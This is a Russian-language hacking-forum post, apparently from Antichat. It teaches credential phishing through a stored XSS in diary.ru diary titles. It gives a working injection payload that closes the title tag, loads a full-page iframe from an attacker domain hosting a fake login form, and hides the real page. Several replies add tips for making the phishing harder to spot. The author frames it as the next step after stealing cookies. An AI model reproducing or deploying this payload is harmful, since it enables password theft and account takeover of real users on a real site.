![]() |
Беспалевный фишинг
Добрый вечер, с вами XenOtai.
Если вы внимательно следите за темой активных хсс, то наверняка видели найденную мной активку на diary.ru. Напомню, что находится она в названии дневника. Положим, вы украли куки, но Вам хочется большего. То есть пароля. Но что, если он сложный и расшифровать его не удалось? Тогда первый выход, который приходит в голову – фишинг. Сделать фальшивую авторизацию, и как только чел зайдёт на свой дневник, его переадресует на сделанную нами форму. Одна проблемка – адрес-то в адресной строке сменится на другой, пусть и похожий. Вы наверняка задавались вопросом, как же этого можно избежать. Итак, заходим на дайри. Вбиваем <xss> в название дневника, бежим смотреть исходник – действительно, фильтрации 0. При этом наш тег выводится в параметре title: Код:
<title>@дневники — <xss></title>А) Фрейм в теле страницы. Б) Скрыть всё лишнее. Как скрыть лишнее? Оч просто: Код:
<body style="visibility:hidden;">Итак, финальный код: Код HTML:
</title><iframe src=http://fuckinghack.ru/auth.html location=top width="1003" height="1800" hspace=0 vspace=0><body style="visibility:hidden;">Для тех, кто в танке, код скрипта (кто-то выкладывал на ачате :) ): PHP код:
Код:
http://diary.ru/~roboboy/XenOtai special for Antichat.ru |
Мдя... совсем для новичков, хотя это то же цель благородная... есть для энтих целей и более красивые методы... читай статьи на ачате... но мах репы поставлю, для начинающих мож быть полезно (увеличивает активность мозга)
|
все вроде нормально только убери скролл а то сильно палится.. + до того можно через жаба скрипт получать разрешение экрана и делать фрейм на всю страницу
тогда не будет трабл с пользовательскими разрешениями |
Можно в статьи добавить, а то здесь потеряется... а некотрым может быть полезно
|
Из статей перенесли сюда.
|
| Время: 16:45 |